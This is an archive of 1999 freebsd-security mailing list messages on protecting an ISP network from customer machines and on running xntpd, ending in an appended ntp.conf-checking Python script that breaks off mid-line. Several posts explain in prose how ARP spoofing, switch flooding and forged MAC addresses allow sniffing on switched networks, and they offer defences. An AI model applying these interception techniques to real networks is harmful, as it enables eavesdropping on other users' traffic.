> Bid and sell for free at http://auctions.yahoo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:49:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from shiva.eu.org (cx943344-a.fed1.sdca.home.com [24.0.167.187]) by hub.freebsd.org (Postfix) with ESMTP id A2C7B15699 for ; Fri, 20 Aug 1999 12:49:37 -0700 (PDT) (envelope-from bigby@shiva.eu.org) Received: from localhost (bigby@localhost) by shiva.eu.org (8.9.3/8.9.3) with ESMTP id MAA24332; Fri, 20 Aug 1999 12:46:33 -0700 (PDT) (envelope-from bigby@shiva.eu.org) Date: Fri, 20 Aug 1999 12:46:28 -0700 (PDT) From: Bigby Findrake To: jay d Cc: "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <19990820192825.15974.rocketmail@web601.yahoomail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 20 Aug 1999, jay d wrote: > What you really want is a VLAN capable switch. VLAN switches simply > designate what ports on a switch can see what other ports on the same > switch. I have to correct you though, Rodney, as sniffing is currently > possible through switches. Please, do tell us how it's possible to sniff through switches. /-------------------------------------------------------------------------/ It's easier to obtain forgiveness than permission. 
finger bigby@shiva.eu.org for my pgpkey e-mail bigby@pager.shiva.eu.org to page me /-------------------------------------------------------------------------/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 12:54: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from abatis.sweb.com (ip-140-066.gw.total-web.net [209.187.140.66]) by hub.freebsd.org (Postfix) with ESMTP id E457014C1E for ; Fri, 20 Aug 1999 12:53:58 -0700 (PDT) (envelope-from zaph0d@abatis.sweb.com) Received: from localhost (zaph0d@localhost) by abatis.sweb.com (8.9.3/8.9.3) with SMTP id PAA84500; Fri, 20 Aug 1999 15:51:58 -0400 (EDT) Date: Fri, 20 Aug 1999 15:51:58 -0400 (EDT) From: zaph0d To: Evren Yurtesen Cc: freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <37BD9E40.7B95E73E@ispro.net.tr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org segment the ethernet. k eep them on their own segment On Fri, 20 Aug 1999, Evren Yurtesen wrote: > Hello, > > We are an ISP and we want to let our customers to put their own hardware > into our network. But the thing we are concerned about is security of > course. How can we protect our system from customers' machines? > > I have heard about somehthing called "virtual network" but I am not sure > of what it means and even if it is the thing I am searching for ? > > thanks! 
> > Evren Yurtesen
> > yurtesen@ispro.net.tr
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Aug 20 13: 6:43 1999
Delivered-To: freebsd-security@freebsd.org
Received: from unix.updatesystems.com (troy-mesa.updatesystems.com [209.38.186.65]) by hub.freebsd.org (Postfix) with ESMTP id 5F64B15AC3 for ; Fri, 20 Aug 1999 13:06:34 -0700 (PDT) (envelope-from jmaslak@updatesystems.com)
Received: from localhost (jmaslak@localhost) by unix.updatesystems.com (8.9.3/8.9.3) with ESMTP id OAA01854 for ; Fri, 20 Aug 1999 14:06:02 -0600
Date: Fri, 20 Aug 1999 14:06:02 -0600 (MDT)
From: Joel Maslak
To: freebsd-security@freebsd.org
Subject: Switches & Security
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

To compromise a network consisting of a switched backbone...

Let's say there are two machines, A and B. Let's say there is a router,
R.

So:

    Internet ---- R ----+
                        |
               A -- SWITCH -- B

Let's say B got compromised.

What B has to do is send ARP broadcasts out, claiming that it is actually
R. Now, it knows R's REAL ethernet address.

If R is busy and doesn't notice this (can be done a lot of ways), A may
change its ARP table. If R notices, it may log this problem, or even
stop working.

Thus, to send packets to the Internet, A ends up sending them to B's
ethernet address (B thinks that is the ethernet address of R). B resends
them (after logging them) to R's real ethernet address.

--- That was method 1. ---

There are MANY ways to invalidate the ARP cache of a switch. Some
crash the switch.

VLANs do *NOT* always protect you, either! VLANs, technically, are just
broadcast domain separations and nothing more. Some switches prevent any
packet from crossing VLAN boundaries.
A lot of others, though, just prevent broadcast packets from crossing
those boundaries. Thus, two machines can communicate through the VLAN
boundary if they know each other's ethernet address.

Sending out forged packets with the source ethernet address of another
VLAN is a sure way to confuse most switches, BTW.

Joel Maslak
UPDATE Systems Inc.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Aug 20 13:15:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id BBF6D14C12 for ; Fri, 20 Aug 1999 13:15:20 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com)
Received: from bug ([198.82.107.38]) by tasam.com (8.9.3/8.9.3) with SMTP id QAA79876; Fri, 20 Aug 1999 16:14:42 -0400 (EDT) (envelope-from freebsd.list@bug.tasam.com)
Message-ID: <000b01beeb48$84609f50$0286860a@tasam.com>
From: "Joe Gleason"
To: "Joel Maslak" ,
References:
Subject: Re: Switches & Security
Date: Fri, 20 Aug 1999 16:13:02 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

One solution for method 1 is to use static arp assignments in the router,
and in both boxes.

>
> To compromise a network consisting of a switched backbone...
>
> Let's say there are two machines, A and B. Let's say there is a router,
> R.
>
> So:
>
>     Internet ---- R ----+
>                         |
>                A -- SWITCH -- B
>
> Let's say B got compromised.
>
> What B has to do is send ARP broadcasts out, claiming that it is actually
> R. Now, it knows R's REAL ethernet address.
>
> If R is busy and doesn't notice this (can be done a lot of ways), A may
> change its ARP table.
If R notices, it may log this problem, or even > stop working. > > Thus, to send packets to the Internet, A ends up sending them to B's > ethernet address (B thinks that is the ethernet address of R). B resends > them (after logging them) to R's real ethernet address. > > --- That was method 1. --- > > There are MANY ways to invalidate the ARP cache of a switch. Some > crash the switch. > > VLANs do *NOT* always protect you, either! VLANs, technically, are just > broadcast domain seperations and nothing more. Some switches prevent any > packet from crossing VLAN boundaries. A lot of others, though, just > prevent broadcast packets from crossing those boundaries. Thus, two > machines can communicate through the VLAN boundary if they know each > other's ethernet address. > > Sending out forged packets with the source ethernet address of another > VLAN is a sure way to confuse most switches, BTW. > > > Joel Maslak > UPDATE Systems Inc. > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13:19:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id 8078E14EE7 for ; Fri, 20 Aug 1999 13:19:25 -0700 (PDT) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3/8.9.3) id NAA20101; Fri, 20 Aug 1999 13:37:00 -0700 (PDT) Date: Fri, 20 Aug 1999 13:36:59 -0700 From: Andre Gironda To: Joel Maslak Cc: freebsd-security@freebsd.org Subject: Re: Switches & Security Message-ID: <19990820133659.B19220@toaster.sun4c.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Joel Maslak on Fri, Aug 20, 1999 at 02:06:02PM -0600 Sender: 
owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org you can't rely on switches for security. this is fairly well-known. i've yet to see much analysis or documentation on this, however. here are a few links for the curious: http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-10-08&thread=Pine.OSF.4.03.9810122112070.6019-100000@gcinfo.gc.maricopa.edu most of the attacks known have to do with either filling up forwarding tables or "leakage" of traffic. there are other, more dangerous attacks that involve the actual protocols themselves (via ieee 802). not to mention attacks on ipv4, arp, icmp, etc. traffic can be SNIFFED. encrypt and authenticate all your traffic if you want it to be safe. researching vpn's and ipsec is step one. dre On Fri, Aug 20, 1999 at 02:06:02PM -0600, Joel Maslak wrote: > > To compromize a network consisting of a switched backbone... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13:37:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from lazlo.internal.steam.com (lazlo.steam.com [199.108.84.37]) by hub.freebsd.org (Postfix) with ESMTP id 0E3DB14BF3 for ; Fri, 20 Aug 1999 13:37:39 -0700 (PDT) (envelope-from cliff@steam.com) Received: from lazlo.internal.steam.com (cliff@lazlo.internal.steam.com [192.168.32.2]) by lazlo.internal.steam.com (8.9.3/8.9.3) with ESMTP id NAA08614; Fri, 20 Aug 1999 13:34:05 -0700 (PDT) Date: Fri, 20 Aug 1999 13:34:05 -0700 (PDT) From: Cliff Skolnick X-Sender: cliff@lazlo.internal.steam.com To: Bigby Findrake Cc: jay d , "Rodney W. 
Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hacked arp code on one machine could return a broadcast or multicast
ethernet address to an arp query for any machine. The switch would then
treat all traffic as broadcast sending it to every port. Since the machine's
TCP/IP layer would receive the packet it would still be on the network, of
course it would be receiving and dropping a bit more. Performance may be
affected. :)

You really want the machines on a separate segment and to be routed instead
of switched.

Cliff

On Fri, 20 Aug 1999, Bigby Findrake wrote:

> On Fri, 20 Aug 1999, jay d wrote:
>
> > What you really want is a VLAN capable switch. VLAN switches simply
> > designate what ports on a switch can see what other ports on the same
> > switch. I have to correct you though, Rodney, as sniffing is currently
> > possible through switches.
>
> Please, do tell us how it's possible to sniff through switches.
>
>
> /-------------------------------------------------------------------------/
> It's easier to obtain forgiveness than permission.
>
> finger bigby@shiva.eu.org for my pgpkey
> e-mail bigby@pager.shiva.eu.org to page me
> /-------------------------------------------------------------------------/
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

--
| Cliff Skolnick            | "They that can give up essential liberty to |
| Steam Tunnel Operations   |  obtain a little temporary safety deserve   |
| cliff@steam.com           |  neither liberty nor safety."               |
| | http://www.steam.com/ | -- Benjamin Franklin, 1759 | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 13:41:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from web601.yahoomail.com (web1204.mail.yahoo.com [128.11.23.140]) by hub.freebsd.org (Postfix) with SMTP id AC14414D5F for ; Fri, 20 Aug 1999 13:41:47 -0700 (PDT) (envelope-from service_account@yahoo.com) Message-ID: <19990820203932.9282.rocketmail@web601.yahoomail.com> Received: from [15.255.160.64] by web1204.mail.yahoo.com; Fri, 20 Aug 1999 13:39:32 PDT Date: Fri, 20 Aug 1999 13:39:32 -0700 (PDT) From: jay d Subject: Re: multiple machines in the same network To: Cliff Skolnick , Bigby Findrake Cc: jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ding ding ding! we have a winner :) that's pretty much it, my friend. jay --- Cliff Skolnick wrote: > > Hacked arp code on one machine could return a > broadcast or multicast > ethernet address to an arp query for any machine. > The switch would then > treat all traffic as broadcast sending it to every > port. Since the machines > TCP/IP layer would receive the packet it woudl still > be on the network, of > course it would be receiving and dropping a bit > more. Performance may be > effected. :) > > You really want the machines on a seperate segment > and to be routed instead > of switched. > > Cliff > > On Fri, 20 Aug 1999, Bigby Findrake wrote: > > > On Fri, 20 Aug 1999, jay d wrote: > > > > > What you really want is a VLAN capable switch. > VLAN switches simply > > > designate what ports on a switch can see what > other ports on the same > > > switch. I have to correct you though, Rodney, as > sniffing is currently > > > possible through switches. 
> > > > Please, do tell us how it's possible to sniff > through switches. > > > > > > > /-------------------------------------------------------------------------/ > > It's easier to obtain forgiveness than permission. > > > > finger bigby@shiva.eu.org for my pgpkey > > e-mail bigby@pager.shiva.eu.org to page me > > > /-------------------------------------------------------------------------/ > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > > > -- > | Cliff Skolnick | "They that can give > up essential liberty to | > | Steam Tunnel Operations | obtain a little > temporary safety deserve | > | cliff@steam.com | neither liberty nor > safety." | > | http://www.steam.com/ | -- > Benjamin Franklin, 1759 | > > __________________________________________________ Do You Yahoo!? Bid and sell for free at http://auctions.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 14:21: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from finland.ispro.net.tr (finland.ispro.net.tr [195.174.18.1]) by hub.freebsd.org (Postfix) with ESMTP id 8E6051501F for ; Fri, 20 Aug 1999 14:20:57 -0700 (PDT) (envelope-from yurtesen@ispro.net.tr) Received: from ispro.net.tr (dyn-0-009.tku.netti.fi [195.16.223.10]) by finland.ispro.net.tr (8.9.3/8.9.3) with ESMTP id AAA31483; Sat, 21 Aug 1999 00:17:54 +0300 (EEST) (envelope-from yurtesen@ispro.net.tr) Message-ID: <37BDC5B5.581082F7@ispro.net.tr> Date: Sat, 21 Aug 1999 00:16:37 +0300 From: Evren Yurtesen X-Mailer: Mozilla 4.51 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Chris Malayter Cc: jay d , "Rodney W. 
Grimes" , freebsd-security@FreeBSD.ORG Subject: Re:(2) multiple machines in the same network References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for all the answers they have very valuable information but also I need documentation about how I can do the things you are suggesting to me. I did not do this kind of thing before so I am not an expert at this so far. well, I have a cisco catalyst switch here, I am able to define static mac addresses. would it be enough for not letting people sniff passwords? also where can I find information about mac addresses? I wonder what would happen if I enable security features on my switch and define static MAC entries for ports and I have 2 machines with the same ip address ? and other security related stuff about what I am trying to do here? is there any web addresses you may suggest? Evren Chris Malayter wrote: > > Care to elaborate on that? I'm in a colocated facility with multiple > boxes that I am sure our root comprimised, if in fact you can sniff on a > switched network, I'de like to know how you protect yourself against that? > > Chris Malayter > > Mustang@TeraHertz.Net > > ------------------------------------------------------------------------- > Administrator, TeraHertz Communications | | > | InterNIC CM3647 | > Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | | > ------------------------------------------------------------------------- > > "Behavior is hard to change...but character is nearly impossible" > > > On Fri, 20 Aug 1999, jay d wrote: > > > What you really want is a VLAN capable switch. VLAN switches simply > > designate what ports on a switch can see what other ports on the same > > switch. I have to correct you though, Rodney, as sniffing is currently > > possible through switches. > > > > Jay > > > > --- "Rodney W. 
Grimes" wrote: > > > > Hello, > > > > > > > > We are an ISP and we want to let our customers to > > > put their own hardware > > > > into our network. But the thing we are concerned > > > about is security of > > > > course. How can we protect our system from > > > customers' machines? > > > > > > I would strongly suggest that you place your > > > customers on a ethernet > > > switch. Any of the modern 10/100 switches work well > > > for this. Each > > > customer gets 1 port on the switch, if they have > > > more than 1 machine > > > they install thier own hub connected to the switch. > > > This prevents > > > them from sniffing other customers traffic. Then > > > you need to setup > > > a router between this switch and your DMZ with a > > > firewall rule set > > > that stops all the nasty stuff like RFC1918 nets, > > > smurf amplifier (block > > > the broadcast addresses to all known subnets), etc. > > > > > > > > > > > I have heard about somehthing called "virtual > > > network" but I am not sure > > > > of what it means and even if it is the thing I am > > > searching for ? > > > > > > You don't need VLAN's for this, it's overkill. > > > > > > -- > > > Rod Grimes - KD7CAX - (RWG25) > > > rgrimes@gndrsh.dnsmgr.net > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of > > > the message > > > > > > > > > > __________________________________________________ > > Do You Yahoo!? 
> > Bid and sell for free at http://auctions.yahoo.com > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 15: 1: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id BAD4914D03 for ; Fri, 20 Aug 1999 15:00:46 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 20091 invoked from network); 21 Aug 1999 07:46:58 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 21 Aug 1999 07:46:58 +1000 Received: (qmail 1606 invoked by uid 1001); 21 Aug 1999 07:46:57 +1000 Message-ID: <19990820214657.1605.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Sat, 21 Aug 1999 07:46:57 +1000 From: Greg Black To: Will Andrews Cc: Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: In-reply-to: of Fri, 20 Aug 1999 11:52:04 -0400 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Xntpd is not that difficult. Unlike ntpdate, it can update your system clock > while also acting as a time server for your local network, reducing bandwidth > costs (yes, minimal, if you have a very small network, but still worth time and > money.) It is also more reliable and far more featureful than ntpdate (hey, > encryption compensation!). Just as a bit of extra information, xntpd is useless for small networks that don't have constant connectivity to time servers. 
In the case of a network that connects to the Internet once or twice a day for just a few minutes, a workable solution is to run ntpdate (with three servers as arguments) on each connection and to use timed on the LAN. The machine that runs ntpdate runs timed with the "-F myname" flag and the others use no flags. If you happen to have a machine that needs its regular tweaks by ntpdate to exceed half a second, then you can adjust the kernel tick a few units either side of its default setting of 10000 so that things stay relatively stable.

> As for "large, expensive daemon", that is incorrect. xntpd barely takes 1MB of
> total RAM on my machine, and usually close to zero CPU.

It may be worth noting that timed is much smaller and uses much less CPU than xntpd. On the other hand, if you do have the connectivity, xntpd is probably the preferred solution.

-- 
Greg Black


From: Poul-Henning Kamp
Date: Sat, 21 Aug 1999 00:06:41 +0200
To: Greg Black
Cc: Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 and setting time

In message <19990820214657.1605.qmail@alice.gba.oz.au>, Greg Black writes:
>> Xntpd is not that difficult. Unlike ntpdate, it can update your system clock
>> while also acting as a time server for your local network, reducing bandwidth
>> costs (yes, minimal, if you have a very small network, but still worth time and
>> money.) It is also more reliable and far more featureful than ntpdate (hey,
>> encryption compensation!).
>
>Just as a bit of extra information, xntpd is useless for small
>networks that don't have constant connectivity to time servers.

Not any longer with ntpv4...

-- 
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!


From: sthaug@nethelp.no
Date: Sat, 21 Aug 1999 00:35:18 +0200
To: gjb-freebsd@gba.oz.au
Cc: andrews@TECHNOLOGIST.COM, brett@lariat.org, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 and setting time

> It may be worth noting that timed is much smaller and uses much
> less CPU than xntpd.

That's probably true - but on today's systems it's also for the most part completely irrelevant. On a P-166 here an xntpd process which has been running for 27 days has used all of 255 CPU seconds (ie. something like 0.01%). It has an RSS of 476 kByte.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no


From: "Rodney W. Grimes"
Date: Fri, 20 Aug 1999 17:27:37 -0700 (PDT)
To: service_account@yahoo.com (jay d)
Cc: yurtesen@ispro.net.tr (Evren Yurtesen), freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network

> What you really want is a VLAN capable switch. VLAN switches simply
> designate what ports on a switch can see what other ports on the same
> switch. I have to correct you though, Rodney, as sniffing is currently
> possible through switches.

Yes, possible, anything is _possible_. But the switch goes a long way against the casual hacker.
Having to break into a machine, spend enough time to hack the arp code, just to sniff a few packets is hardly worth the hassle. And it is usually detected before they get very far anyway due to the massive change in traffic patterns this causes.

I already said to put the switch on its own router port with full and correct filtering. I see a lot of people replying to ``put them on their own segment''. Now I am not sure if they mean put each individual customer on their own segment, or to lump them all together on one segment. My model was to put them all on one switch, with that whole segment of the network separated and protected in both directions from any of the ISP's and Internet stuff via a router with filtering capability. Putting 2 customers on any one segment is always a bad idea; it allows either to compromise the other easily by simple tcpdump style sniffing.

The customer per router port is probably the most secure model, even more secure than a VLAN switch and single filtered router port; it is also the most expensive model.

And in final defense of my statement, the person specifically asked ``How can we protect OUR systems from customers' machines?''. My solution clearly provides that, and just a little bit more: it also protects each customer from each other from casual attacks.

> Jay
> 
> --- "Rodney W. Grimes" wrote:
> > > Hello,
> > > 
> > > We are an ISP and we want to let our customers to put their own
> > > hardware into our network. But the thing we are concerned about is
> > > security of course. How can we protect our system from customers'
> > > machines?
> > 
> > I would strongly suggest that you place your customers on an ethernet
> > switch. Any of the modern 10/100 switches work well for this. Each
> > customer gets 1 port on the switch; if they have more than 1 machine
> > they install their own hub connected to the switch. This prevents
> > them from sniffing other customers' traffic. Then you need to setup
> > a router between this switch and your DMZ with a firewall rule set
> > that stops all the nasty stuff like RFC1918 nets, smurf amplifier
> > (block the broadcast addresses to all known subnets), etc.
> > 
> > > I have heard about something called "virtual network" but I am not
> > > sure of what it means and even if it is the thing I am searching
> > > for?
> > 
> > You don't need VLAN's for this, it's overkill.
> > 
> > -- 
> > Rod Grimes - KD7CAX - (RWG25)
> > rgrimes@gndrsh.dnsmgr.net

-- 
Rod Grimes - KD7CAX - (RWG25)                        rgrimes@gndrsh.dnsmgr.net


From: Jon Hamilton
Date: Fri, 20 Aug 1999 22:19:48 -0500
To: Greg Black
Cc: Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 and setting time

In message <19990820214657.1605.qmail@alice.gba.oz.au>, Greg Black wrote:
} > Xntpd is not that difficult. Unlike ntpdate, it can update your system clock
} > while also acting as a time server for your local network, reducing bandwidth
} > costs (yes, minimal, if you have a very small network, but still worth time and
} > money.) It is also more reliable and far more featureful than ntpdate (hey,
} > encryption compensation!).
} 
} Just as a bit of extra information, xntpd is useless for small
} networks that don't have constant connectivity to time servers.

Absolutely untrue. There's value in keeping a group of machines synchronized to _each other_, regardless of whether they're also synchronized to the correct time. It is true that _for some purposes_ xntpd isn't all that useful in an intermittently-connected scenario, but that doesn't render it completely devoid of any value.
-- 
Jon Hamilton
hamilton@pobox.com


From: Karl Denninger
Date: Fri, 20 Aug 1999 22:24:19 -0500
To: Jon Hamilton, Greg Black
Cc: Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 and setting time

On Fri, Aug 20, 1999 at 10:19:48PM -0500, Jon Hamilton wrote:
> 
> In message <19990820214657.1605.qmail@alice.gba.oz.au>, Greg Black wrote:
> } > Xntpd is not that difficult. Unlike ntpdate, it can update your system clock
> } > while also acting as a time server for your local network, reducing bandwidth
> } > costs (yes, minimal, if you have a very small network, but still worth time and
> } > money.) It is also more reliable and far more featureful than ntpdate (hey,
> } > encryption compensation!).
> } 
> } Just as a bit of extra information, xntpd is useless for small
> } networks that don't have constant connectivity to time servers.
> 
> Absolutely untrue. There's value in keeping a group of machines
> synchronized to _each other_, regardless of whether they're also
> synchronized to the correct time. It is true that _for some purposes_
> xntpd isn't all that useful in an intermittently-connected scenario,
> but that doesn't render it completely devoid of any value.
> 
> -- 
> Jon Hamilton
> hamilton@pobox.com

It's not at all difficult to wire a GPS to be the "master" upon which XNTPD syncs.

Without PPS output you won't be COMPLETELY accurate, but a few tens of milliseconds should be good enough for most purposes :-)

-- 
Karl Denninger (karl@denninger.net)  Web: childrens-justice.org
Tired of the broken divorce system in the United States and what it's doing to our kids? SIGN the online petition for equal parental - and children's - rights at the above URL. Make a difference in a kid's life today.
Real-time chat now available from the above web page


From: Matthew Dillon
Date: Fri, 20 Aug 1999 20:46:10 -0700 (PDT)
To: Karl Denninger
Cc: Jon Hamilton, Greg Black, Will Andrews, Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 and setting time

:> Absolutely untrue. There's value in keeping a group of machines
:> synchronized to _each other_, regardless of whether they're also
:> synchronized to the correct time. It is true that _for some purposes_
:> xntpd isn't all that useful in an intermittently-connected scenario,
:> but that doesn't render it completely devoid of any value.
:> 
:> -- 
:> Jon Hamilton
:> hamilton@pobox.com
:
:It's not at all difficult to wire a GPS to be the "master" upon which XNTPD
:syncs.
:
:Without PPS output you won't be COMPLETELY accurate, but a few tens of
:Karl Denninger (karl@denninger.net)  Web: childrens-justice.org

    It's fairly easy to setup xntpd to use a local clock when it cannot find a remote clock. As long as the two don't get too badly out of sync from each other xntpd can switch between them. I use this trick all the time for machines which are not always connected to the net.

    What you do is have one machine on your LAN be a stratum 8 time source. You also set it up to connect to a real time source on the internet. When you have internet connectivity the real time source wins. When you don't, the local stratum 8 time source wins. Simple!

    See /usr/src/usr.sbin/xntpd/doc/README.refclock and other documentation for more information.

                                        -Matt

    monitor no
    broadcastclient no
    broadcast (my LAN broadcast address)
    restrict 0.0.0.0 notrust nomodify
    server 127.127.1.0
    fudge 127.127.1.0 stratum 8
    restrict (someinternetip) ...
    server (sameinternetip) ...
    driftfile /var/run/ntp.drift


From: mike@sentex.net (Mike Tancsa)
Date: Sat, 21 Aug 1999 05:22:50 GMT
To: jmaslak@updatesystems.com (Joel Maslak)
Cc: freebsd-security@freebsd.org
Subject: Re: Switches & Security

On 20 Aug 1999 16:07:48 -0400, in sentex.lists.freebsd.misc you wrote:

>
>To compromise a network consisting of a switched backbone...
>
>Internet ---- R ----+
>                    |
>              A -- SWITCH -- B
>
>Let's say B got compromised.
>
>What B has to do is send ARP broadcasts out, claiming that it is actually
>R. Now, it knows R's REAL ethernet address.
>--- That was method 1. ---

On the Catalysts, you can nail down the ARP address statically and have it ignore any other MAC addresses that would leak out.

>
>There are MANY ways to invalidate the ARP cache of a switch. Some
>crash the switch.

Even if it's hard coded in the switch not to allow any other MAC addresses out?

---Mike
Mike Tancsa (mdtancsa@sentex.net)
Sentex Communications Corp, Waterloo, Ontario, Canada
"Who is this 'BSD', and why should we free him?"
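A check for the fallback pattern Matt describes above (a local clock fudged to a high stratum so that a real server wins whenever the link is up), added here as example code rather than anything from Matt's post; the two ntp.conf samples are constructed, and 192.0.2.10 is a documentation address standing in for the "(someinternetip)" placeholder.

```python
"""Check an xntpd/ntpd ntp.conf for the local-clock fallback pattern from this
thread. Example code added to the archive; the sample configs below are
constructed and 192.0.2.10 stands in for the thread's "(someinternetip)"."""
from typing import Dict, List, Optional

# Address of xntpd's "local clock" reference clock driver (type 1, unit 0).
LOCAL_CLOCK = "127.127.1.0"
# Stratum to fudge onto the local clock so any real server outranks it.
MIN_FALLBACK_STRATUM = 8

Conf = Dict[str, List[List[str]]]


def parse_ntp_conf(text: str) -> Conf:
    """Group directives by keyword: {'server': [['127.127.1.0'], ['192.0.2.10']], ...}."""
    conf: Conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and blank lines
        if not line:
            continue
        keyword, *args = line.split()
        conf.setdefault(keyword, []).append(args)
    return conf


def fudge_stratum(conf: Conf) -> Optional[int]:
    """Stratum fudged onto the local clock, or None if there is no such fudge line."""
    for args in conf.get("fudge", []):
        if args and args[0] == LOCAL_CLOCK and "stratum" in args:
            idx = args.index("stratum")
            if idx + 1 < len(args) and args[idx + 1].isdigit():
                return int(args[idx + 1])
    return None


def check_fallback(conf: Conf) -> List[str]:
    """Return human-readable findings; an empty list means the pattern is intact."""
    findings: List[str] = []
    servers = [args[0] for args in conf.get("server", []) if args]

    if LOCAL_CLOCK not in servers:
        findings.append("no 'server 127.127.1.0': nothing to fall back to when the link is down")
    else:
        stratum = fudge_stratum(conf)
        if stratum is None:
            findings.append("local clock not fudged to a high stratum: it is not demoted below real servers")
        elif stratum < MIN_FALLBACK_STRATUM:
            findings.append(f"local clock fudged to stratum {stratum}; use {MIN_FALLBACK_STRATUM} "
                            "or higher so an Internet server always wins when reachable")

    if not [s for s in servers if not s.startswith("127.127.")]:
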